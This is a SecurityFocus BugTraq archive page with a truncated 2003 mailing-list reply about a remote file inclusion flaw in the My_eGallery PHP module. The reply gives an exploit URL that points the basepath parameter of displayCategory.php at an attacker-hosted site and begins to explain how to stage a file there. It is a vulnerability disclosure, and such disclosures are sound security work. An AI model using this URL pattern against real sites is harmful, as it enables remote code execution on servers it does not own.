Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Vista
BugTraq
Name:
Email:
*Note: Email address will appear as "user domain ext" to prevent harvesting.
Subject:
Message:
 
Re: Remote execution in My_eGallery Nov 30 2003 12:16AM
Fauvet Ludovic (etix runbox com)

Hi,
There is some php scrits which are vulnerables.
One of these is displayCategory.php .
So you just have to go to:
http://www.[vulnerable].com/modules/My_eGallery/public/displayCategory.p
hp?basepath=http://[youwebsite].com
And create a directory "public" in the root of your website and put a
fil...

[ more ]  





 

Privacy Statement
Copyright 2008, SecurityFocus